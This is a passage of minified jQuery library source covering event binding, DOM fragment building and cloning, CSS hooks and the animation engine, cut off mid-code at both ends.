this!==b||a.isSimulated||a.isTrigger||"radio"!==b.type&&"checkbox"!==b.type?a.handleObj.handler.apply(this,arguments):void 0},teardown:function(){return m.event.remove(this,"._change"),!X.test(this.nodeName)}}),k.focusinBubbles||m.each({focus:"focusin",blur:"focusout"},function(a,b){var c=function(a){m.event.simulate(b,a.target,m.event.fix(a),!0)};m.event.special[b]={setup:function(){var d=this.ownerDocument||this,e=m._data(d,b);e||d.addEventListener(a,c,!0),m._data(d,b,(e||0)+1)},teardown:function(){var d=this.ownerDocument||this,e=m._data(d,b)-1;e?m._data(d,b,e):(d.removeEventListener(a,c,!0),m._removeData(d,b))}}}),m.fn.extend({on:function(a,b,c,d,e){var f,g;if("object"==typeof a){"string"!=typeof b&&(c=c||b,b=void 0);for(f in a)this.on(f,b,c,a[f],e);return this}if(null==c&&null==d?(d=b,c=b=void 0):null==d&&("string"==typeof b?(d=c,c=void 0):(d=c,c=b,b=void 0)),d===!1)d=bb;else if(!d)return this;return 1===e&&(g=d,d=function(a){return m().off(a),g.apply(this,arguments)},d.guid=g.guid||(g.guid=m.guid++)),this.each(function(){m.event.add(this,a,d,c,b)})},one:function(a,b,c,d){return this.on(a,b,c,d,1)},off:function(a,b,c){var d,e;if(a&&a.preventDefault&&a.handleObj)return d=a.handleObj,m(a.delegateTarget).off(d.namespace?d.origType+"."+d.namespace:d.origType,d.selector,d.handler),this;if("object"==typeof a){for(e in a)this.off(e,b,a[e]);return this}return(b===!1||"function"==typeof b)&&(c=b,b=void 0),c===!1&&(c=bb),this.each(function(){m.event.remove(this,a,c,b)})},trigger:function(a,b){return this.each(function(){m.event.trigger(a,b,this)})},triggerHandler:function(a,b){var c=this[0];return c?m.event.trigger(a,b,c,!0):void 0}});function db(a){var b=eb.split("|"),c=a.createDocumentFragment();if(c.createElement)while(b.length)c.createElement(b.pop());return c}var eb="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",fb=/ jQuery\d+="(?:null|\d+)"/g,gb=new RegExp("<(?:"+eb+")[\\s/>]","i"),hb=/^\s+/,ib=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,jb=/<([\w:]+)/,kb=/<tbody/i,lb=/<|&#?\w+;/,mb=/<(?:script|style|link)/i,nb=/checked\s*(?:[^=]|=\s*.checked.)/i,ob=/^$|\/(?:java|ecma)script/i,pb=/^true\/(.*)/,qb=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,rb={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:k.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},sb=db(y),tb=sb.appendChild(y.createElement("div"));rb.optgroup=rb.option,rb.tbody=rb.tfoot=rb.colgroup=rb.caption=rb.thead,rb.th=rb.td;function ub(a,b){var c,d,e=0,f=typeof a.getElementsByTagName!==K?a.getElementsByTagName(b||"*"):typeof a.querySelectorAll!==K?a.querySelectorAll(b||"*"):void 0;if(!f)for(f=[],c=a.childNodes||a;null!=(d=c[e]);e++)!b||m.nodeName(d,b)?f.push(d):m.merge(f,ub(d,b));return void 0===b||b&&m.nodeName(a,b)?m.merge([a],f):f}function vb(a){W.test(a.type)&&(a.defaultChecked=a.checked)}function wb(a,b){return m.nodeName(a,"table")&&m.nodeName(11!==b.nodeType?b:b.firstChild,"tr")?a.getElementsByTagName("tbody")[0]||a.appendChild(a.ownerDocument.createElement("tbody")):a}function xb(a){return a.type=(null!==m.find.attr(a,"type"))+"/"+a.type,a}function yb(a){var b=pb.exec(a.type);return b?a.type=b[1]:a.removeAttribute("type"),a}function zb(a,b){for(var c,d=0;null!=(c=a[d]);d++)m._data(c,"globalEval",!b||m._data(b[d],"globalEval"))}function Ab(a,b){if(1===b.nodeType&&m.hasData(a)){var c,d,e,f=m._data(a),g=m._data(b,f),h=f.events;if(h){delete g.handle,g.events={};for(c in h)for(d=0,e=h[c].length;e>d;d++)m.event.add(b,c,h[c][d])}g.data&&(g.data=m.extend({},g.data))}}function Bb(a,b){var c,d,e;if(1===b.nodeType){if(c=b.nodeName.toLowerCase(),!k.noCloneEvent&&b[m.expando]){e=m._data(b);for(d in e.events)m.removeEvent(b,d,e.handle);b.removeAttribute(m.expando)}"script"===c&&b.text!==a.text?(xb(b).text=a.text,yb(b)):"object"===c?(b.parentNode&&(b.outerHTML=a.outerHTML),k.html5Clone&&a.innerHTML&&!m.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):"input"===c&&W.test(a.type)?(b.defaultChecked=b.checked=a.checked,b.value!==a.value&&(b.value=a.value)):"option"===c?b.defaultSelected=b.selected=a.defaultSelected:("input"===c||"textarea"===c)&&(b.defaultValue=a.defaultValue)}}m.extend({clone:function(a,b,c){var d,e,f,g,h,i=m.contains(a.ownerDocument,a);if(k.html5Clone||m.isXMLDoc(a)||!gb.test("<"+a.nodeName+">")?f=a.cloneNode(!0):(tb.innerHTML=a.outerHTML,tb.removeChild(f=tb.firstChild)),!(k.noCloneEvent&&k.noCloneChecked||1!==a.nodeType&&11!==a.nodeType||m.isXMLDoc(a)))for(d=ub(f),h=ub(a),g=0;null!=(e=h[g]);++g)d[g]&&Bb(e,d[g]);if(b)if(c)for(h=h||ub(a),d=d||ub(f),g=0;null!=(e=h[g]);g++)Ab(e,d[g]);else Ab(a,f);return d=ub(f,"script"),d.length>0&&zb(d,!i&&ub(a,"script")),d=h=e=null,f},buildFragment:function(a,b,c,d){for(var e,f,g,h,i,j,l,n=a.length,o=db(b),p=[],q=0;n>q;q++)if(f=a[q],f||0===f)if("object"===m.type(f))m.merge(p,f.nodeType?[f]:f);else if(lb.test(f)){h=h||o.appendChild(b.createElement("div")),i=(jb.exec(f)||["",""])[1].toLowerCase(),l=rb[i]||rb._default,h.innerHTML=l[1]+f.replace(ib,"<$1></$2>")+l[2],e=l[0];while(e--)h=h.lastChild;if(!k.leadingWhitespace&&hb.test(f)&&p.push(b.createTextNode(hb.exec(f)[0])),!k.tbody){f="table"!==i||kb.test(f)?"<table>"!==l[1]||kb.test(f)?0:h:h.firstChild,e=f&&f.childNodes.length;while(e--)m.nodeName(j=f.childNodes[e],"tbody")&&!j.childNodes.length&&f.removeChild(j)}m.merge(p,h.childNodes),h.textContent="";while(h.firstChild)h.removeChild(h.firstChild);h=o.lastChild}else p.push(b.createTextNode(f));h&&o.removeChild(h),k.appendChecked||m.grep(ub(p,"input"),vb),q=0;while(f=p[q++])if((!d||-1===m.inArray(f,d))&&(g=m.contains(f.ownerDocument,f),h=ub(o.appendChild(f),"script"),g&&zb(h),c)){e=0;while(f=h[e++])ob.test(f.type||"")&&c.push(f)}return h=null,o},cleanData:function(a,b){for(var d,e,f,g,h=0,i=m.expando,j=m.cache,l=k.deleteExpando,n=m.event.special;null!=(d=a[h]);h++)if((b||m.acceptData(d))&&(f=d[i],g=f&&j[f])){if(g.events)for(e in g.events)n[e]?m.event.remove(d,e):m.removeEvent(d,e,g.handle);j[f]&&(delete j[f],l?delete d[i]:typeof d.removeAttribute!==K?d.removeAttribute(i):d[i]=null,c.push(f))}}}),m.fn.extend({text:function(a){return V(this,function(a){return void 0===a?m.text(this):this.empty().append((this[0]&&this[0].ownerDocument||y).createTextNode(a))},null,a,arguments.length)},append:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=wb(this,a);b.appendChild(a)}})},prepend:function(){return this.domManip(arguments,function(a){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var b=wb(this,a);b.insertBefore(a,b.firstChild)}})},before:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this)})},after:function(){return this.domManip(arguments,function(a){this.parentNode&&this.parentNode.insertBefore(a,this.nextSibling)})},remove:function(a,b){for(var c,d=a?m.filter(a,this):this,e=0;null!=(c=d[e]);e++)b||1!==c.nodeType||m.cleanData(ub(c)),c.parentNode&&(b&&m.contains(c.ownerDocument,c)&&zb(ub(c,"script")),c.parentNode.removeChild(c));return this},empty:function(){for(var a,b=0;null!=(a=this[b]);b++){1===a.nodeType&&m.cleanData(ub(a,!1));while(a.firstChild)a.removeChild(a.firstChild);a.options&&m.nodeName(a,"select")&&(a.options.length=0)}return this},clone:function(a,b){return a=null==a?!1:a,b=null==b?a:b,this.map(function(){return m.clone(this,a,b)})},html:function(a){return V(this,function(a){var b=this[0]||{},c=0,d=this.length;if(void 0===a)return 1===b.nodeType?b.innerHTML.replace(fb,""):void 0;if(!("string"!=typeof a||mb.test(a)||!k.htmlSerialize&&gb.test(a)||!k.leadingWhitespace&&hb.test(a)||rb[(jb.exec(a)||["",""])[1].toLowerCase()])){a=a.replace(ib,"<$1></$2>");try{for(;d>c;c++)b=this[c]||{},1===b.nodeType&&(m.cleanData(ub(b,!1)),b.innerHTML=a);b=0}catch(e){}}b&&this.empty().append(a)},null,a,arguments.length)},replaceWith:function(){var a=arguments[0];return this.domManip(arguments,function(b){a=this.parentNode,m.cleanData(ub(this)),a&&a.replaceChild(b,this)}),a&&(a.length||a.nodeType)?this:this.remove()},detach:function(a){return this.remove(a,!0)},domManip:function(a,b){a=e.apply([],a);var c,d,f,g,h,i,j=0,l=this.length,n=this,o=l-1,p=a[0],q=m.isFunction(p);if(q||l>1&&"string"==typeof p&&!k.checkClone&&nb.test(p))return this.each(function(c){var d=n.eq(c);q&&(a[0]=p.call(this,c,d.html())),d.domManip(a,b)});if(l&&(i=m.buildFragment(a,this[0].ownerDocument,!1,this),c=i.firstChild,1===i.childNodes.length&&(i=c),c)){for(g=m.map(ub(i,"script"),xb),f=g.length;l>j;j++)d=i,j!==o&&(d=m.clone(d,!0,!0),f&&m.merge(g,ub(d,"script"))),b.call(this[j],d,j);if(f)for(h=g[g.length-1].ownerDocument,m.map(g,yb),j=0;f>j;j++)d=g[j],ob.test(d.type||"")&&!m._data(d,"globalEval")&&m.contains(h,d)&&(d.src?m._evalUrl&&m._evalUrl(d.src):m.globalEval((d.text||d.textContent||d.innerHTML||"").replace(qb,"")));i=c=null}return this}}),m.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){m.fn[a]=function(a){for(var c,d=0,e=[],g=m(a),h=g.length-1;h>=d;d++)c=d===h?this:this.clone(!0),m(g[d])[b](c),f.apply(e,c.get());return this.pushStack(e)}});var Cb,Db={};function Eb(b,c){var d,e=m(c.createElement(b)).appendTo(c.body),f=a.getDefaultComputedStyle&&(d=a.getDefaultComputedStyle(e[0]))?d.display:m.css(e[0],"display");return e.detach(),f}function Fb(a){var b=y,c=Db[a];return c||(c=Eb(a,b),"none"!==c&&c||(Cb=(Cb||m("<iframe frameborder='0' width='0' height='0'/>")).appendTo(b.documentElement),b=(Cb[0].contentWindow||Cb[0].contentDocument).document,b.write(),b.close(),c=Eb(a,b),Cb.detach()),Db[a]=c),c}!function(){var a;k.shrinkWrapBlocks=function(){if(null!=a)return a;a=!1;var b,c,d;return c=y.getElementsByTagName("body")[0],c&&c.style?(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),typeof b.style.zoom!==K&&(b.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:1px;width:1px;zoom:1",b.appendChild(y.createElement("div")).style.width="5px",a=3!==b.offsetWidth),c.removeChild(d),a):void 0}}();var Gb=/^margin/,Hb=new RegExp("^("+S+")(?!px)[a-z%]+$","i"),Ib,Jb,Kb=/^(top|right|bottom|left)$/;a.getComputedStyle?(Ib=function(b){return b.ownerDocument.defaultView.opener?b.ownerDocument.defaultView.getComputedStyle(b,null):a.getComputedStyle(b,null)},Jb=function(a,b,c){var d,e,f,g,h=a.style;return c=c||Ib(a),g=c?c.getPropertyValue(b)||c[b]:void 0,c&&(""!==g||m.contains(a.ownerDocument,a)||(g=m.style(a,b)),Hb.test(g)&&Gb.test(b)&&(d=h.width,e=h.minWidth,f=h.maxWidth,h.minWidth=h.maxWidth=h.width=g,g=c.width,h.width=d,h.minWidth=e,h.maxWidth=f)),void 0===g?g:g+""}):y.documentElement.currentStyle&&(Ib=function(a){return a.currentStyle},Jb=function(a,b,c){var d,e,f,g,h=a.style;return c=c||Ib(a),g=c?c[b]:void 0,null==g&&h&&h[b]&&(g=h[b]),Hb.test(g)&&!Kb.test(b)&&(d=h.left,e=a.runtimeStyle,f=e&&e.left,f&&(e.left=a.currentStyle.left),h.left="fontSize"===b?"1em":g,g=h.pixelLeft+"px",h.left=d,f&&(e.left=f)),void 0===g?g:g+""||"auto"});function Lb(a,b){return{get:function(){var c=a();if(null!=c)return c?void delete this.get:(this.get=b).apply(this,arguments)}}}!function(){var b,c,d,e,f,g,h;if(b=y.createElement("div"),b.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",d=b.getElementsByTagName("a")[0],c=d&&d.style){c.cssText="float:left;opacity:.5",k.opacity="0.5"===c.opacity,k.cssFloat=!!c.cssFloat,b.style.backgroundClip="content-box",b.cloneNode(!0).style.backgroundClip="",k.clearCloneStyle="content-box"===b.style.backgroundClip,k.boxSizing=""===c.boxSizing||""===c.MozBoxSizing||""===c.WebkitBoxSizing,m.extend(k,{reliableHiddenOffsets:function(){return null==g&&i(),g},boxSizingReliable:function(){return null==f&&i(),f},pixelPosition:function(){return null==e&&i(),e},reliableMarginRight:function(){return null==h&&i(),h}});function i(){var b,c,d,i;c=y.getElementsByTagName("body")[0],c&&c.style&&(b=y.createElement("div"),d=y.createElement("div"),d.style.cssText="position:absolute;border:0;width:0;height:0;top:0;left:-9999px",c.appendChild(d).appendChild(b),b.style.cssText="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;display:block;margin-top:1%;top:1%;border:1px;padding:1px;width:4px;position:absolute",e=f=!1,h=!0,a.getComputedStyle&&(e="1%"!==(a.getComputedStyle(b,null)||{}).top,f="4px"===(a.getComputedStyle(b,null)||{width:"4px"}).width,i=b.appendChild(y.createElement("div")),i.style.cssText=b.style.cssText="-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:0",i.style.marginRight=i.style.width="0",b.style.width="1px",h=!parseFloat((a.getComputedStyle(i,null)||{}).marginRight),b.removeChild(i)),b.innerHTML="<table><tr><td></td><td>t</td></tr></table>",i=b.getElementsByTagName("td"),i[0].style.cssText="margin:0;border:0;padding:0;display:none",g=0===i[0].offsetHeight,g&&(i[0].style.display="",i[1].style.display="none",g=0===i[0].offsetHeight),c.removeChild(d))}}}(),m.swap=function(a,b,c,d){var e,f,g={};for(f in b)g[f]=a.style[f],a.style[f]=b[f];e=c.apply(a,d||[]);for(f in b)a.style[f]=g[f];return e};var Mb=/alpha\([^)]*\)/i,Nb=/opacity\s*=\s*([^)]*)/,Ob=/^(none|table(?!-c[ea]).+)/,Pb=new RegExp("^("+S+")(.*)$","i"),Qb=new RegExp("^([+-])=("+S+")","i"),Rb={position:"absolute",visibility:"hidden",display:"block"},Sb={letterSpacing:"0",fontWeight:"400"},Tb=["Webkit","O","Moz","ms"];function Ub(a,b){if(b in a)return b;var c=b.charAt(0).toUpperCase()+b.slice(1),d=b,e=Tb.length;while(e--)if(b=Tb[e]+c,b in a)return b;return d}function Vb(a,b){for(var c,d,e,f=[],g=0,h=a.length;h>g;g++)d=a[g],d.style&&(f[g]=m._data(d,"olddisplay"),c=d.style.display,b?(f[g]||"none"!==c||(d.style.display=""),""===d.style.display&&U(d)&&(f[g]=m._data(d,"olddisplay",Fb(d.nodeName)))):(e=U(d),(c&&"none"!==c||!e)&&m._data(d,"olddisplay",e?c:m.css(d,"display"))));for(g=0;h>g;g++)d=a[g],d.style&&(b&&"none"!==d.style.display&&""!==d.style.display||(d.style.display=b?f[g]||"":"none"));return a}function Wb(a,b,c){var d=Pb.exec(b);return d?Math.max(0,d[1]-(c||0))+(d[2]||"px"):b}function Xb(a,b,c,d,e){for(var f=c===(d?"border":"content")?4:"width"===b?1:0,g=0;4>f;f+=2)"margin"===c&&(g+=m.css(a,c+T[f],!0,e)),d?("content"===c&&(g-=m.css(a,"padding"+T[f],!0,e)),"margin"!==c&&(g-=m.css(a,"border"+T[f]+"Width",!0,e))):(g+=m.css(a,"padding"+T[f],!0,e),"padding"!==c&&(g+=m.css(a,"border"+T[f]+"Width",!0,e)));return g}function Yb(a,b,c){var d=!0,e="width"===b?a.offsetWidth:a.offsetHeight,f=Ib(a),g=k.boxSizing&&"border-box"===m.css(a,"boxSizing",!1,f);if(0>=e||null==e){if(e=Jb(a,b,f),(0>e||null==e)&&(e=a.style[b]),Hb.test(e))return e;d=g&&(k.boxSizingReliable()||e===a.style[b]),e=parseFloat(e)||0}return e+Xb(a,b,c||(g?"border":"content"),d,f)+"px"}m.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=Jb(a,"opacity");return""===c?"1":c}}}},cssNumber:{columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":k.cssFloat?"cssFloat":"styleFloat"},style:function(a,b,c,d){if(a&&3!==a.nodeType&&8!==a.nodeType&&a.style){var e,f,g,h=m.camelCase(b),i=a.style;if(b=m.cssProps[h]||(m.cssProps[h]=Ub(i,h)),g=m.cssHooks[b]||m.cssHooks[h],void 0===c)return g&&"get"in g&&void 0!==(e=g.get(a,!1,d))?e:i[b];if(f=typeof c,"string"===f&&(e=Qb.exec(c))&&(c=(e[1]+1)*e[2]+parseFloat(m.css(a,b)),f="number"),null!=c&&c===c&&("number"!==f||m.cssNumber[h]||(c+="px"),k.clearCloneStyle||""!==c||0!==b.indexOf("background")||(i[b]="inherit"),!(g&&"set"in g&&void 0===(c=g.set(a,c,d)))))try{i[b]=c}catch(j){}}},css:function(a,b,c,d){var e,f,g,h=m.camelCase(b);return b=m.cssProps[h]||(m.cssProps[h]=Ub(a.style,h)),g=m.cssHooks[b]||m.cssHooks[h],g&&"get"in g&&(f=g.get(a,!0,c)),void 0===f&&(f=Jb(a,b,d)),"normal"===f&&b in Sb&&(f=Sb[b]),""===c||c?(e=parseFloat(f),c===!0||m.isNumeric(e)?e||0:f):f}}),m.each(["height","width"],function(a,b){m.cssHooks[b]={get:function(a,c,d){return c?Ob.test(m.css(a,"display"))&&0===a.offsetWidth?m.swap(a,Rb,function(){return Yb(a,b,d)}):Yb(a,b,d):void 0},set:function(a,c,d){var e=d&&Ib(a);return Wb(a,c,d?Xb(a,b,d,k.boxSizing&&"border-box"===m.css(a,"boxSizing",!1,e),e):0)}}}),k.opacity||(m.cssHooks.opacity={get:function(a,b){return Nb.test((b&&a.currentStyle?a.currentStyle.filter:a.style.filter)||"")?.01*parseFloat(RegExp.$1)+"":b?"1":""},set:function(a,b){var c=a.style,d=a.currentStyle,e=m.isNumeric(b)?"alpha(opacity="+100*b+")":"",f=d&&d.filter||c.filter||"";c.zoom=1,(b>=1||""===b)&&""===m.trim(f.replace(Mb,""))&&c.removeAttribute&&(c.removeAttribute("filter"),""===b||d&&!d.filter)||(c.filter=Mb.test(f)?f.replace(Mb,e):f+" "+e)}}),m.cssHooks.marginRight=Lb(k.reliableMarginRight,function(a,b){return b?m.swap(a,{display:"inline-block"},Jb,[a,"marginRight"]):void 0}),m.each({margin:"",padding:"",border:"Width"},function(a,b){m.cssHooks[a+b]={expand:function(c){for(var d=0,e={},f="string"==typeof c?c.split(" "):[c];4>d;d++)e[a+T[d]+b]=f[d]||f[d-2]||f[0];return e}},Gb.test(a)||(m.cssHooks[a+b].set=Wb)}),m.fn.extend({css:function(a,b){return V(this,function(a,b,c){var d,e,f={},g=0;if(m.isArray(b)){for(d=Ib(a),e=b.length;e>g;g++)f[b[g]]=m.css(a,b[g],!1,d);return f}return void 0!==c?m.style(a,b,c):m.css(a,b)},a,b,arguments.length>1)},show:function(){return Vb(this,!0)},hide:function(){return Vb(this)},toggle:function(a){return"boolean"==typeof a?a?this.show():this.hide():this.each(function(){U(this)?m(this).show():m(this).hide()})}});function Zb(a,b,c,d,e){return new Zb.prototype.init(a,b,c,d,e)
}m.Tween=Zb,Zb.prototype={constructor:Zb,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||"swing",this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(m.cssNumber[c]?"":"px")},cur:function(){var a=Zb.propHooks[this.prop];return a&&a.get?a.get(this):Zb.propHooks._default.get(this)},run:function(a){var b,c=Zb.propHooks[this.prop];return this.pos=b=this.options.duration?m.easing[this.easing](a,this.options.duration*a,0,1,this.options.duration):a,this.now=(this.end-this.start)*b+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),c&&c.set?c.set(this):Zb.propHooks._default.set(this),this}},Zb.prototype.init.prototype=Zb.prototype,Zb.propHooks={_default:{get:function(a){var b;return null==a.elem[a.prop]||a.elem.style&&null!=a.elem.style[a.prop]?(b=m.css(a.elem,a.prop,""),b&&"auto"!==b?b:0):a.elem[a.prop]},set:function(a){m.fx.step[a.prop]?m.fx.step[a.prop](a):a.elem.style&&(null!=a.elem.style[m.cssProps[a.prop]]||m.cssHooks[a.prop])?m.style(a.elem,a.prop,a.now+a.unit):a.elem[a.prop]=a.now}}},Zb.propHooks.scrollTop=Zb.propHooks.scrollLeft={set:function(a){a.elem.nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},m.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2}},m.fx=Zb.prototype.init,m.fx.step={};var $b,_b,ac=/^(?:toggle|show|hide)$/,bc=new RegExp("^(?:([+-])=|)("+S+")([a-z%]*)$","i"),cc=/queueHooks$/,dc=[ic],ec={"*":[function(a,b){var c=this.createTween(a,b),d=c.cur(),e=bc.exec(b),f=e&&e[3]||(m.cssNumber[a]?"":"px"),g=(m.cssNumber[a]||"px"!==f&&+d)&&bc.exec(m.css(c.elem,a)),h=1,i=20;if(g&&g[3]!==f){f=f||g[3],e=e||[],g=+d||1;do h=h||".5",g/=h,m.style(c.elem,a,g+f);while(h!==(h=c.cur()/d)&&1!==h&&--i)}return e&&(g=c.start=+g||+d||0,c.unit=f,c.end=e[1]?g+(e[1]+1)*e[2]:+e[2]),c}]};function fc(){return setTimeout(function(){$b=void 0}),$b=m.now()}function gc(a,b){var c,d={height:a},e=0;for(b=b?1:0;4>e;e+=2-b)c=T[e],d["margin"+c]=d["padding"+c]=a;return b&&(d.opacity=d.width=a),d}function hc(a,b,c){for(var d,e=(ec[b]||[]).concat(ec["*"]),f=0,g=e.length;g>f;f++)if(d=e[f].call(c,b,a))return d}function ic(a,b,c){var d,e,f,g,h,i,j,l,n=this,o={},p=a.style,q=a.nodeType&&U(a),r=m._data(a,"fxshow");c.queue||(h=m._queueHooks(a,"fx"),null==h.unqueued&&(h.unqueued=0,i=h.empty.fire,h.empty.fire=function(){h.unqueued||i()}),h.unqueued++,n.always(function(){n.always(function(){h.unqueued--,m.queue(a,"fx").length||h.empty.fire()})})),1===a.nodeType&&("height"in b||"width"in b)&&(c.overflow=[p.overflow,p.overflowX,p.overflowY],j=m.css(a,"display"),l="none"===j?m._data(a,"olddisplay")||Fb(a.nodeName):j,"inline"===l&&"none"===m.css(a,"float")&&(k.inlineBlockNeedsLayout&&"inline"!==Fb(a.nodeName)?p.zoom=1:p.display="inline-block")),c.overflow&&(p.overflow="hidden",k.shrinkWrapBlocks()||n.always(function(){p.overflow=c.overflow[0],p.overflowX=c.overflow[1],p.overflowY=c.overflow[2]}));for(d in b)if(e=b[d],ac.exec(e)){if(delete b[d],f=f||"toggle"===e,e===(q?"hide":"show")){if("show"!==e||!r||void 0===r[d])continue;q=!0}o[d]=r&&r[d]||m.style(a,d)}else j=void 0;if(m.isEmptyObject(o))"inline"===("none"===j?Fb(a.nodeName):j)&&(p.display=j);else{r?"hidden"in r&&(q=r.hidden):r=m._data(a,"fxshow",{}),f&&(r.hidden=!q),q?m(a).show():n.done(function(){m(a).hide()}),n.done(function(){var b;m._removeData(a,"fxshow");for(b in o)m.style(a,b,o[b])});for(d in o)g=hc(q?r[d]:0,d,n),d in r||(r[d]=g.start,q&&(g.end=g.start,g.start="width"===d||"height"===d?1:0))}}function jc(a,b){var c,d,e,f,g;for(c in a)if(d=m.camelCase(c),e=b[d],f=a[c],m.isArray(f)&&(e=f[1],f=a[c]=f[0]),c!==d&&(a[d]=f,delete a[c]),g=m.cssHooks[d],g&&"expand"in g){f=g.expand(f),delete a[d];for(c in f)c in a||(a[c]=f[c],b[c]=e)}else b[d]=e}function kc(a,b,c){var d,e,f=0,g=dc.length,h=m.Deferred().always(function(){delete i.elem}),i=function(){if(e)return!1;for(var b=$b||fc(),c=Math.max(0,j.startTime+j.duration-b),d=c/j.duration||0,f=1-d,g=0,i=j.tweens.length;i>g;g++)j.tweens[g].run(f);return h.notifyWith(a,[j,f,c]),1>f&&i?c:(h.resolveWith(a,[j]),!1)},j=h.promise({elem:a,props:m.extend({},b),opts:m.extend(!0,{specialEasing:{}},c),originalProperties:b,originalOptions:c,startTime:$b||fc(),duration:c.duration,tweens:[],createTween:function(b,c){var d=m.Tween(a,j.opts,b,c,j.opts.specialEasing[b]||j.opts.easing);return j.tweens.push(d),d},stop:function(b){var c=0,d=b?j.tweens.length:0;if(e)return this;for(e=!0;d>c;c++)j.tweens[c].run(1);return b?h.resolveWith(a,[j,b]):h.rejectWith(a,[j,b]),this}}),k=j.props;for(jc(k,j.opts.specialEasing);g>f;f++)if(d=dc[f].call(j,a,k,j.opts))return d;return m.map(k,hc,j),m.isFunction(j.opts.start)&&j.opts.start.call(a,j),m.fx.timer(m.extend(i,{elem:a,anim:j,queue:j.opts.queue})),j.progress(j.opts.progress).done(j.opts.done,j.opts.complete).fail(j.opts.fail).always(j.opts.always)}m.Animation=m.extend(kc,{tweener:function(a,b){m.isFunction(a)?(b=a,a=["*"]):a=a.split(" ");for(var c,d=0,e=a.length;e>d;d++)c=a[d],ec[c]=ec[c]||[],ec[c].unshift(b)},prefilter:function(a,b){b?dc.unshift(a):dc.push(a)}}),m.speed=function(a,b,c){var d=a&&"object"==typeof a?m.extend({},a):{complete:c||!c&&b||m.isFunction(a)&&a,duration:a,easing:c&&b||b&&!m.isFunction(b)&&b};return d.duration=m.fx.off?0:"number"==typeof d.duration?d.duration:d.duration in m.fx.speeds?m.fx.speeds[d.duration]:m.fx.speeds._default,(null==d.queue||d.queue===!0)&&(d.queue="fx"),d.old=d.complete,d.complete=function(){m.isFunction(d.old)&&d.old.call(this),d.queue&&m.dequeue(this,d.queue)},d},m.fn.extend({fadeTo:function(a,b,c,d){return this.filter(U).css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=m.isEmptyObject(a),f=m.speed(b,c,d),g=function(){var b=kc(this,m.extend({},a),f);(e||m._data(this,"finish"))&&b.stop(!0)};return g.finish=g,e||f.queue===!1?this.each(g):this.queue(f.queue,g)},stop:function(a,b,c){var d=function(a){var b=a.stop;delete a.stop,b(c)};return"string"!=typeof a&&(c=b,b=a,a=void 0),b&&a!==!1&&this.queue(a||"fx",[]),this.each(function(){var b=!0,e=null!=a&&a+"queueHooks",f=m.timers,g=m._data(this);if(e)g[e]&&g[e].stop&&d(g[e]);else for(e in g)g[e]&&g[e].stop&&cc.test(e)&&d(g[e]);for(e=f.length;e--;)f[e].elem!==this||null!=a&&f[e].queue!==a||(f[e].anim.stop(c),b=!1,f.splice(e,1));(b||!c)&&m.dequeue(this,a)})},finish:function(a){return a!==!1&&(a=a||"fx"),this.each(function(){var b,c=m._data(this),d=c[a+"queue"],e=c[a+"queueHooks"],f=m.timers,g=d?d.length:0;for(c.finish=!0,m.queue(this,a,[]),e&&e.stop&&e.stop.call(this,!0),b=f.length;b--;)f[b].elem===this&&f[b].queue===a&&(f[b].anim.stop(!0),f.splice(b,1));for(b=0;g>b;b++)d[b]&&d[b].finish&&d[b].finish.call(this);delete c.finish})}}),m.each(["toggle","show","hide"],function(a,b){var c=m.fn[b];m.fn[b]=function(a,d,e){return null==a||"boolean"==typeof a?c.apply(this,arguments):this.animate(gc(b,!0),a,d,e)}}),m.each({slideDown:gc("show"),slideUp:gc("hide"),slideToggle:gc("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){m.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),m.timers=[],m.fx.tick=function(){var a,b=m.timers,c=0;for($b=m.now();c<b.length;c++)a=b[c],a()||b[c]!==a||b.splice(c--,1);b.length||m.fx.stop(),$b=void 0},m.fx.timer=function(a){m.timers.push(a),a()?m.fx.start():m.timers.pop()},m.fx.interval=13,m.fx.start=function(){_b||(_b=setInterval(m.fx.tick,m.fx.interval))},m.fx.stop=function(){clearInterval(_b),_b=null},m.fx.speeds={slow:600,fast:200,_default:400},m.fn.delay=function(a,b){return a=m.fx?m.fx.speeds[a]||a:a,b=b||"fx",this.queue(b,function(b,c){var d=setTimeout(b,a);c.stop=function(){clearTimeout(d)}})},function(){var a,b,c,d,e;b=y.createElement("div"),b.setAttribute("className","t"),b.innerHTML="  <link/><table></table><a href='/a'>a</a><input 